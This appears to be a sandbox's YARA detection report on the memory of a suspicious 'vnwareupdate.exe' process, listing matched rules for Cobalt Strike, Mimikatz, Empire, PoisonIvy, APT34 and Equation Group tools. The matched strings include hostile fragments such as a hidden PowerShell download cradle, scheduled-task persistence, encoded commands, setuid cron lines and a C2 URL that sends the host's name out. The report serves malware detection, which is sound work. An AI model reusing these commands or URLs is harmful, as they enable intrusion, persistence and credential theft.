Process Memory Space: vnwareupdate.exe PID: 2540	VBS_WMIExec_Tool_Apr17_1	Tools related to Operation Cloud Hopper	Florian Roth	0xdba649:$a1: WMIEXEC ERROR: Command -> 0xdba678:$a2: WMIEXEC : Command result will output to 0xdba6bd:$a3: WMIEXEC : Target -> 0xdba6ee:$a4: WMIEXEC : Login -> OK 0xdba721:$a5: WMIEXEC : Process created. PID:
Process Memory Space: vnwareupdate.exe PID: 2540	Regin_Related_Malware	Malware Sample - maybe Regin related	Florian Roth	0xe771a8:$s2: %x:%x:%x:%x:%x:%x:%x:%x%c 0xe771df:$s3: disp.dll 0xe77205:$s4: msvcrtd.dll 0xe7722e:$s5: %d.%d.%d.%d%c
Process Memory Space: vnwareupdate.exe PID: 2540	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0xd6d676:$x1: Nuclear Explosion.g.resources 0xd6d6f7:$x4: 5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41 0xd6d73e:$x5: \RevengeRAT\ 0xd6d760:$x6: Revenge-RAT client has been successfully installed. 0xd6d7a8:$x7: Nuclear Explosion.exe
Process Memory Space: vnwareupdate.exe PID: 2540	Mimipenguin_SH	Detects Mimipenguin Password Extractor - Linux	Florian Roth	0xdbd204:$s1: $(echo $thishash \| cut -d'$' -f 3) 0xdbd290:$s3: MimiPenguin Results:
Process Memory Space: vnwareupdate.exe PID: 2540	HKTL_PowerKatz_Feb19_1	Detetcs a tool used in the Australian Parliament House network compromise	Florian Roth	0xd1cb6a:$x1: Powerkatz32 0xd1cb98:$x2: Powerkatz64 0xd1cbbd:$s1: GetData: not found taskName 0xd1cbfb:$s2: GetRes Ex:
Process Memory Space: vnwareupdate.exe PID: 2540	HKTL_Unknown_Feb19_1	Detetcs a tool used in the Australian Parliament House network compromise	Florian Roth	0xd1ce41:$x1: not a valid timeout format! 0xd1ce7f:$x2: host can not be empty! 0xd1ceb8:$x3: not a valid port format! 0xd1cef3:$x4: {0} - {1} TTL={2} time={3} 0xd1cf30:$x5: ping count is not a correct format! 0xd1cf76:$s1: The result is too large,program store to '{0}'.Please download it manully.
Process Memory Space: vnwareupdate.exe PID: 2540	POSHSPY_Malware	Detects	Florian Roth	0xd7a980:$x1: function sWP($cN, $pN, $aK, $aI) 0xd7a9be:$x2: $aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2 0xd7a9fa:$x3: (('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len', 0xd7aa8c:$x5: $exeRes = exePldRoutine 0xd7aab3:$x6: ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA
Process Memory Space: vnwareupdate.exe PID: 2540	Pirpi_1609_A	Detects Pirpi Backdoor - and other malware (generic rule)	Florian Roth	0xde410c:$x1: expand.exe1.gif 0xde4139:$c1: expand.exe 0xde4161:$c2: ctf.exe 0xde41e1:$s3: ctfnon.exe 0xde4209:$s4: flv%d.exe 0xde4271:$s6: 12811[%d].gif 0xde42e7:$s9: %d-%4.4d%d 0xde4310:$s10: http://%s/%5.5d.html
Process Memory Space: vnwareupdate.exe PID: 2540	Pirpi_1609_B	Detects Pirpi Backdoor	Florian Roth	0xde462d:$s1: tconn <ip> <port> //set temp connect value, and disconnect. 0xde4686:$s2: E* ListenCheckSsl SslRecv fd(%d) Error ret:%d %d 0xde46d4:$s3: %s %s L* ListenCheckSsl fd(%d) SslV(-%d-) 0xde471b:$s4: S:%d.%d-%d.%d V(%d.%d) Listen On %d Ok. 0xde4760:$s5: E* ListenCheckSsl fd(%d) SslAccept Err %d 0xde47a7:$s6: %s-%s N110 Ssl Connect Ok(%s:%d). 0xde47e6:$s7: %s-%s N110 Basic Connect Ok(%s:%d). 0xde462d:$s8: tconn <ip> <port> 0xde4827:$s8: tconn <ip> <port>
Process Memory Space: vnwareupdate.exe PID: 2540	FourElementSword_Config_File	Detects FourElementSword Malware	Florian Roth	0xe069dd:$s0: 01,,hccutils.dll,2 0xe06a0d:$s1: RegisterDlls=OurDll 0xe06a3e:$s2: [OurDll] 0xe06a64:$s3: [DefaultInstall]
Process Memory Space: vnwareupdate.exe PID: 2540	FourElementSword_ElevateDLL_2	Detects FourElementSword Malware	Florian Roth	0xe06d27:$s1: Elevate.dll 0xe0766b:$s1: Elevate.dll 0xe07e6a:$s1: Elevate.dll 0xe07694:$s2: GetSomeF 0x5613b6:$s3: GetNativeSystemInfo 0xe076ba:$s3: GetNativeSystemInfo
Process Memory Space: vnwareupdate.exe PID: 2540	Win_PrivEsc_gp3finder_v4_0	Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe	Florian Roth	0xdffe8d:$x1: Check for and attempt to decrypt passwords on share 0xdffed5:$x2: Failed to auto get and decrypt passwords. {0}s/ 0xdfff22:$x3: GPPPFinder - Group Policy Preference Password Finder
Process Memory Space: vnwareupdate.exe PID: 2540	Win_PrivEsc_folderperm	Detects a tool that can be used for privilege escalation - file folderperm.ps1	Florian Roth	0xe001ae:$x1: # powershell.exe -executionpolicy bypass -file folderperm.ps1
Process Memory Space: vnwareupdate.exe PID: 2540	PoisonIvy_Sample_6	Detects PoisonIvy RAT sample set	Florian Roth	0xe78681:$x1: 124.133.252.150 0xe786ae:$x3: http://124.133.254.171/up/up.asp?id=%08x&pcname=%s 0xe7879c:$z4: \tappmgmts.dll 0xe787c9:$z5: \appmgmts.dll 0xe7890f:$s4: CONNECT %s:%i HTTP/1.0 0xe78943:$s5: start read histry key 0xe789d0:$s7: [password]%s 0xe789fa:$s8: Daemon.dll 0xe78a22:$s9: [username]%s 0xe78a4d:$s10: advpack 0xe78a73:$s11: %s%2.2X 0xe78a99:$s12: advAPI32
Process Memory Space: vnwareupdate.exe PID: 2540	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0xd70063:$loader_export: ReflectiveLoader 0xd70120:$loader_export: ReflectiveLoader 0xd707d5:$loader_export: ReflectiveLoader 0xd708be:$loader_export: ReflectiveLoader 0xd7726f:$loader_export: ReflectiveLoader 0xd77366:$loader_export: ReflectiveLoader 0xd782db:$loader_export: ReflectiveLoader 0xd78ba1:$loader_export: ReflectiveLoader 0xd7902d:$loader_export: ReflectiveLoader 0xdea657:$exportname: beacon.dll
Process Memory Space: vnwareupdate.exe PID: 2540	Metasploit_Loader_RSMudge	Detects a Metasploit Loader by RSMudge - file loader.exe	Florian Roth	0xe04add:$s1: Could not resolve target 0xdf0c23:$s2: Could not connect to target 0xe04b13:$s2: Could not connect to target 0xe04b4c:$s3: %s [host] [port] 0xe04b7a:$s4: ws2_32.dll is out of date. 0xe04bb2:$s5: read a strange or incomplete length value
Process Memory Space: vnwareupdate.exe PID: 2540	OilRig_Malware_Campaign_Gen2	Detects malware from OilRig Campaign	Florian Roth	0xddf1ef:$s2: $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(' 0xddf25d:$s3: &{$rn = Get-Random; $id = 'TR 0xddf298:$s4: ') -replace '__',('DNS'+$id) \| 0xddf2d6:$s5: \upd.vbs 0xddf2fc:$s6: schtasks /create /F /sc minute /mo 0xddf33d:$s7: ') -replace '__',('HTP'+$id) \| 0xddf37a:$s8: &{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ 0xddf3cf:$s9: http://www.israirairlines.com/?mode=page&page=14635&lang=eng<
Process Memory Space: vnwareupdate.exe PID: 2540	APT_APT34_PS_Malware_Apr19_1	Detects APT34 PowerShell malware	Florian Roth	0xd18c58:$x1: = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0xd18fd2:$x1: = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0xd18cf3:$s1: Start-Sleep -s 1; 0xd18d22:$s2: Start-Sleep -m 100;
Process Memory Space: vnwareupdate.exe PID: 2540	APT_APT34_PS_Malware_Apr19_3	Detects APT34 PowerShell malware	Florian Roth	0xd19373:$x1: Powershell.exe -exec bypass -file ${global:$address1} 0xd193b8:$x2: schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn 0xd19465:$x5: ::FromBase64String([string]${global:$http_ag})) 0xd194ed:$x7: \UpdateTask.vbs 0xd1951a:$x8: hUpdater.ps1
Process Memory Space: vnwareupdate.exe PID: 2540	Silence_malware_2	Detects malware sample mentioned in the Silence report on Securelist	Florian Roth	0xd5da1f:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error 0xd5da7d:$s2: \mss.exe 0xd5daa4:$s3: \out.dat 0xd5dacb:$s4: \mss.txt 0xd5daf1:$s5: Default monitor
Process Memory Space: vnwareupdate.exe PID: 2540	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0xd7a24f:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm 0xd5d222:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp 0xd7a2d6:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
Process Memory Space: vnwareupdate.exe PID: 2540	NTLM_Dump_Output	NTML Hash Dump output file - John/LC format	Florian Roth	0xdffbc8:$s0: 500:AAD3B435B51404EEAAD3B435B51404EE: 0xdffc02:$s1: 500:aad3b435b51404eeaad3b435b51404ee:
Process Memory Space: vnwareupdate.exe PID: 2540	FIN7_Backdoor_Aug17	Detects Word Dropper from Proofpoint FIN7 Report	Florian Roth	0xd73c04:$s1: /?page=wait 0xd73c2d:$a1: autoit3.exe 0xd73c56:$a2: dumpcap.exe 0xd73c7f:$a3: tshark.exe 0xd73ca7:$a4: prl_cc.exe 0xbca53e:$v1: vmware 0xd73ccf:$v1: vmware 0xd73d29:$v3: VMWVMCIHOSTDEV 0xd73d55:$c1: apowershell 0xd73d7e:$c2: wpowershell 0xd73da7:$c3: get_passwords 0xd73dd2:$c4: kill_process 0xd73dfc:$c5: get_screen
Process Memory Space: vnwareupdate.exe PID: 2540	Invoke_WMIExec_Gen_1	Detects Invoke-WmiExec or Invoke-SmbExec	Florian Roth	0xd85c79:$x1: Invoke-WMIExec 0xd85c9d:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split)) 0xd85db0:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList 0xd85e1d:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
Process Memory Space: vnwareupdate.exe PID: 2540	WMImplant	Auto-generated rule - file WMImplant.ps1	Florian Roth	0xdbdaff:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential 0xdbdc70:$x6: Invoke-WMImplant
Process Memory Space: vnwareupdate.exe PID: 2540	HKTL_Dsniff	Detects Dsniff hack tool	Florian Roth	0xd1b3bf:$x1: .account.\|.acct.\|.domain.\|.login.\|.member.
Process Memory Space: vnwareupdate.exe PID: 2540	APT_Project_Sauron_arping_module	Detects strings from arping module - Project Sauron report by Kaspersky	Florian Roth	0xdf860c:$s1: Resolve hosts that answer 0xdf8635:$s2: Print only replying Ips 0xdf865c:$s3: Do not display MAC addresses
Process Memory Space: vnwareupdate.exe PID: 2540	APT_Project_Sauron_kblogi_module	Detects strings from kblogi module - Project Sauron report by Kaspersky	Florian Roth	0xdf8ae6:$x1: Inject using process name or pid. Default 0xdf8b1f:$s2: Convert mode: Read log from file and convert to text 0xdf8b63:$s3: Maximum running time in seconds
Process Memory Space: vnwareupdate.exe PID: 2540	APT_Project_Sauron_basex_module	Detects strings from basex module - Project Sauron report by Kaspersky	Florian Roth	0xdf8873:$x1: 64, 64url, 32, 32url or 16. 0xdf889e:$s2: Force decoding when input is invalid/corrupt 0xdf88da:$s3: This cruft 0xdf8e4b:$s3: This cruft 0xdf8ee5:$s3: This cruft 0xdf9093:$s3: This cruft
Process Memory Space: vnwareupdate.exe PID: 2540	APT_Project_Sauron_dext_module	Detects strings from dext module - Project Sauron report by Kaspersky	Florian Roth	0xdf8d80:$x1: Assemble rows of DNS names back to a single string of data 0xdf8dca:$x2: removes checks of DNS names and lengths (during split) 0xdf8e10:$x3: Randomize data lengths (length/2 to length) 0xdf88da:$x4: This cruft 0xdf8e4b:$x4: This cruft 0xdf8ee5:$x4: This cruft 0xdf9093:$x4: This cruft
Process Memory Space: vnwareupdate.exe PID: 2540	GRIZZLY_STEPPE_Malware_2	Auto-generated rule	Florian Roth	0xdd45c6:$x1: GoogleCrashReport.dll 0xdd45f9:$s1: CrashErrors 0xdd4622:$s2: CrashSend 0xdd4649:$s3: CrashAddData 0xdd4673:$s4: CrashCleanup 0xdd469d:$s5: CrashInit
Process Memory Space: vnwareupdate.exe PID: 2540	Invoke_OSiRis	Osiris Device Guard Bypass - file Invoke-OSiRis.ps1	Florian Roth	0xdbd48c:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target 0xdbd340:$x2: Invoke-OSiRis 0xdbd518:$x2: Invoke-OSiRis 0xdbd53a:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username} 0xdbd599:$x4: Device Guard Bypass Command Execution 0xdbd5dc:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath 0xdbd48c:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create 0xdbd635:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
Process Memory Space: vnwareupdate.exe PID: 2540	Sofacy_Fybis_ELF_Backdoor_Gen1	Detects Sofacy Fysbis Linux Backdoor	Florian Roth	0xe09f9e:$x1: Your command not writed to pipe 0xe09fdb:$x2: Terminal don`t started for executing command 0xe0a061:$s1: WantedBy=multi-user.target' >> /usr/lib/systemd/system/ 0xe0a0b6:$s2: Success execute command or long for waiting executing your command 0xe0a19e:$s4: rm -f /usr/lib/systemd/system/ 0xe0a1da:$s5: ExecStart= 0xe0a202:$s6: <table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>
Process Memory Space: vnwareupdate.exe PID: 2540	Greenbug_Malware_4	Detects ISMDoor Backdoor	Florian Roth	0xdcb6ac:$s4: taskkill /im winit.exe /f 0xdcb6e3:$s5: invoke-psuacme 0xdcb770:$s8: Invoke-bypassuac
Process Memory Space: vnwareupdate.exe PID: 2540	Winnti_NlaifSvc	Winnti sample - file NlaifSvc.dll	Florian Roth	0xdcae22:$x1: cracked by ximo 0xdcae46:$s1: Yqrfpk 0xdcae6a:$s2: IVVTOC
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Get_SecurityPackages	Detects Empire component - file Get-SecurityPackages.ps1	Florian Roth	0xdd81d4:$s1: $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000) 0xdd8225:$s2: $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_PowerDump	Detects Empire component - file Invoke-PowerDump.ps1	Florian Roth	0xdd84e0:$x16: $enc = Get-PostHashdumpScript 0xdd851c:$x19: $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword; 0xdd8580:$x20: $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_ShellcodeMSIL	Detects Empire component - file Invoke-ShellcodeMSIL.ps1	Florian Roth	0xdd8844:$s1: $FinalShellcode.Length 0xdd8878:$s2: @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3) 0xdd88c1:$s3: @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57, 0xdd8909:$s4: $TargetMethod.Invoke($null, @(0x11112222)) \| Out-Null
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_SmbScanner	Detects Empire component - file Invoke-SmbScanner.ps1	Florian Roth	0xdd91af:$s1: $up = Test-Connection -count 1 -Quiet -ComputerName $Computer 0xdd920b:$s2: $out \| add-member Noteproperty 'Password' $Password
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_EgressCheck	Detects Empire component - file Invoke-EgressCheck.ps1	Florian Roth	0xdd9b8f:$s1: egress -ip $ip -port $c -delay $delay -protocol $protocol
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_PostExfil	Detects Empire component - file Invoke-PostExfil.ps1	Florian Roth	0xdda713:$s1: # upload to a specified exfil URI 0xdda752:$s2: Server path to exfil to.
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_SMBAutoBrute	Detects Empire component - file Invoke-SMBAutoBrute.ps1	Florian Roth	0xdda9cf:$s1: [*] PDC: LAB-2008-DC1.lab.com 0xddaa0a:$s2: $attempts = Get-UserBadPwdCount $userid $dcs
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Get_Keystrokes	Detects Empire component - file Get-Keystrokes.ps1	Florian Roth	0xddac92:$s1: $RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_DllInjection	Detects Empire component - file Invoke-DllInjection.ps1	Florian Roth	0xddaf75:$s1: -Dll evil.dll
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_KeePassConfig	Detects Empire component - file KeePassConfig.ps1	Florian Roth	0xddb1dc:$s1: $UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force \| Select-Object -ExpandProperty FullName) )
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_PowerUp_Gen	Detects Empire component - from files PowerUp.ps1, PowerUp.ps1	Florian Roth	0xddb813:$s1: $Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath 0xddb876:$s2: $Result = sc.exe pause $($TargetService.Name)
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_KeePassConfig_Gen	Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1	Florian Roth	0xddc1b4:$s1: $KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_Portscan_Gen	Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1	Florian Roth	0xddc470:$s1: Test-Port -h $h -p $Port -timeout $Timeout 0xddc4b8:$s2: 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
Process Memory Space: vnwareupdate.exe PID: 2540	Empire_Invoke_Gen	Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1	Florian Roth	0xddc7a0:$s1: $Shellcode1 += 0x48 0xddc7d1:$s2: $PEHandle = [IntPtr]::Zero
Process Memory Space: vnwareupdate.exe PID: 2540	TeleBots_IntercepterNG	Detects TeleBots malware - IntercepterNG	Florian Roth	0xdd4bc1:$s2: Target%d found: %s - [%.2X-%.2X-%.2X-%.2X-%.2X-%.2X] 0xdd4c13:$s3: 3: passwords + files, no arp poison 0xdd4c54:$s4: IRC Joining Keyed Channel intercepted 0xdd4c97:$s5: -tX - set target ip 0xdd4cc8:$s6: w - save session to .pcap dump 0xdd4d04:$s7: example: %s 1 1 -gw 192.168.1.1 -t1 192.168.1.3 -t2 192.168.1.5 0xdd4d61:$s8: ORACLE8 DES Authorization intercepted
Process Memory Space: vnwareupdate.exe PID: 2540	WiltedTulip_powershell	Detects powershell script used in Operation Wilted Tulip	Florian Roth	0xd76895:$x1: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
Process Memory Space: vnwareupdate.exe PID: 2540	WiltedTulip_Windows_UM_Task	Detects a Windows scheduled task as used in Operation Wilted Tulip	Florian Roth	0xd77636:$c2: svchost64.swp,checkUpdate
Process Memory Space: vnwareupdate.exe PID: 2540	WiltedTulip_WindowsTask	Detects hack tool used in Operation Wilted Tulip - Windows Tasks	Florian Roth	0xd778ea:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
Process Memory Space: vnwareupdate.exe PID: 2540	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0xd78deb:$x2: %d is an x86 process (can't inject x64 content) 0xd88492:$x2: %d is an x86 process (can't inject x64 content) 0xdea3c8:$x2: %d is an x86 process (can't inject x64 content) 0xd6120a:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xd78e38:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xd883da:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xdea5ad:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0xd78e9f:$x4: Failed to impersonate token from %d (%u) 0xdea67f:$x4: Failed to impersonate token from %d (%u) 0xd6116f:$x5: Failed to impersonate logged on user %d (%u) 0xd78ee5:$x5: Failed to impersonate logged on user %d (%u) 0xdea563:$x5: Failed to impersonate logged on user %d (%u) 0xd61315:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0xd78f2f:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0xd8854a:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Process Memory Space: vnwareupdate.exe PID: 2540	Impacket_Tools_Generic_1	Compiled Impacket Tools	Florian Roth	0xdb9f7d:$s1: bpywintypes27.dll 0xdb9fac:$s2: hZFtPC 0xd413ae:$s3: impacket 0xd414da:$s3: impacket 0xd415db:$s3: impacket 0xd41616:$s3: impacket 0xd4164b:$s3: impacket 0xd41680:$s3: impacket 0xd416ae:$s3: impacket 0xd416d9:$s3: impacket 0xd41705:$s3: impacket 0xd7406d:$s3: impacket 0xd74098:$s3: impacket 0xd740c4:$s3: impacket 0xdb5f46:$s3: impacket 0xdb6085:$s3: impacket 0xdb61bc:$s3: impacket 0xdb6426:$s3: impacket 0xdb6569:$s3: impacket 0xdb669b:$s3: impacket 0xdb68e6:$s3: impacket
Process Memory Space: vnwareupdate.exe PID: 2540	Invoke_mimikittenz	Detects Mimikittenz - file Invoke-mimikittenz.ps1	Florian Roth	0xdf98e5:$x1: [mimikittenz.MemProcInspector] 0xdf9918:$s1: PROCESS_ALL_ACCESS = PROCESS_TERMINATE \| PROCESS_CREATE_THREAD \| PROCESS_SET_SESSIONID \| PROCESS_VM_OPERATION \| 0xdf99a5:$s2: IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ \| MInterop.PROCESS_QUERY_INFORMATION, false, process.Id); 0xdf9a41:$s3: &email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=
Process Memory Space: vnwareupdate.exe PID: 2540	ONHAT_Proxy_Hacktool	Detects ONHAT Proxy - Htran like SOCKS hack tool used by Chinese APT groups	Florian Roth	0xe0275d:$s1: INVALID PARAMETERS. TYPE ONHAT.EXE -h FOR HELP INFORMATION. 0xe027b6:$s2: [ONHAT] LISTENS (S, %d.%d.%d.%d, %d) ERROR. 0xe027ff:$s3: [ONHAT] CONNECTS (T, %d.%d.%d.%d, %d.%d.%d.%d, %d) ERROR.
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_elgingamble	Equation Group hack tool leaked by ShadowBrokers- file elgingamble	Florian Roth	0xdadf6e:$x1: * * * * * root chown root %s; chmod 4755 %s; %s 0xdadfbb:$x2: [-] kernel not vulnerable 0xdb18e1:$x2: [-] kernel not vulnerable 0xdb1c4e:$x2: [-] kernel not vulnerable 0xdb1f3a:$x2: [-] kernel not vulnerable 0xdadff2:$x3: [-] failed to spawn shell: %s 0xdae02d:$x4: -s shell Use shell instead of %s
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_cmsd	Equation Group hack tool leaked by ShadowBrokers- file cmsd	Florian Roth	0xdae28c:$x1: usage: %s address [-t][-s\|-c command] [-p port] [-v 5\|6\|7] 0xdae2e4:$x2: error: not vulnerable 0xdae317:$s1: port=%d connected! 0xdae348:$s2: xxx.XXXXXX
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_ebbshave	Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5	Florian Roth	0xdae5d9:$s1: executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s 0xdae630:$s2: ./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772 0xdae687:$s3: version 1 - Start with option #18 first, if it fails then try this option 0xdae6ee:$s4: %s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_eggbasket	Equation Group hack tool leaked by ShadowBrokers- file eggbasket	Florian Roth	0xdae9c0:$x1: # Building Shellcode into exploit. 0xdaea7d:$x3: # STARTING EXHAUSTIVE ATTACK AGAINST
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_sambal	Equation Group hack tool leaked by ShadowBrokers- file sambal	Florian Roth	0xdaf02d:$s1: + Bruteforce mode. 0xdaf05d:$s3: + Host is not running samba! 0xdaf097:$s4: + connecting back to: [%d.%d.%d.%d:45295] 0xdaf0de:$s5: + Exploit failed, try -b to bruteforce. 0xdaf123:$s7: Usage: %s [-bBcCdfprsStv] [host]
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_cmsex	Equation Group hack tool leaked by ShadowBrokers- file cmsex	Florian Roth	0xdafb19:$x1: Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> \| -t <port>) 0xdafb8d:$x2: -i target ip address / hostname 0xdafbcb:$x3: Note: Choosing the correct target type is a bit of guesswork. 0xdafc26:$x4: Solaris rpc.cmsd remote root exploit 0xdafc68:$x5: If one choice fails, you may want to try another.
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_DUL	Equation Group hack tool leaked by ShadowBrokers- file DUL	Florian Roth	0xdb01d8:$x1: ?Usage: %s <shellcode> <output_file> 0xdb021a:$x2: Here is the decoder+(encoded-decoder)+payload
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_slugger2	Equation Group hack tool leaked by ShadowBrokers- file slugger2	Florian Roth	0xdb04ca:$x1: usage: %s hostip port cmd [printer_name] 0xdb0510:$x2: command must be less than 61 chars 0xdb0550:$s1: __rw_read_waiting 0xdaff3c:$s2: completed.1 0xdb057f:$s2: completed.1 0xdb05a8:$s3: __mutexkind 0xdb05d1:$s4: __rw_pshared
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_jackpop	Equation Group hack tool leaked by ShadowBrokers- file jackpop	Florian Roth	0xdb0c8c:$x1: %x:%d --> %x:%d %d bytes 0xdb0cc3:$s1: client: can't bind to local address, are you root? 0xdb0d13:$s2: Unable to register port 0xdb0d48:$s3: Could not resolve destination 0xdb0d83:$s4: raw troubles
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_epoxyresin_v1_0_0	Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1	Florian Roth	0xdadfbb:$x1: [-] kernel not vulnerable 0xdb18e1:$x1: [-] kernel not vulnerable 0xdb1c4e:$x1: [-] kernel not vulnerable 0xdb1f3a:$x1: [-] kernel not vulnerable 0xdb1918:$s1: .tmp.%d.XXXXXX 0xdb1944:$s2: [-] couldn't create temp file 0xdb197f:$s3: /boot/System.map-%s
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_estesfox	Equation Group hack tool leaked by ShadowBrokers- file estesfox	Florian Roth	0xdb30d4:$x1: chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup__ftshell_ftshell_v3_10_3_0	Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7	Florian Roth	0xdb3b05:$s3: system rm -f /current/tmp/ftshell.latest 0xdb3b4b:$s4: # ftshell -- File Transfer Shell
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup__scanner_scanner_v2_1_2	Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2	Florian Roth	0xd955a4:$s1: Welcome to the network scanning tool 0xdb3e11:$s1: Welcome to the network scanning tool 0xdb3e53:$s2: Scanning port %d 0xdb3e81:$s3: /current/down/cmdout/scans 0xdb3eb9:$s4: Scan for SSH version 0xdb3eeb:$s5: program vers proto port service
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup__ghost_sparc_ghost_x86_3	Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86	Florian Roth	0xdb41b5:$x1: Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target 0xdb4210:$x2: Sending shellcode as part of an open command... 0xdb425d:$x3: cmdshellcode 0xdb4287:$x4: You will not be able to run the shellcode. Exiting...
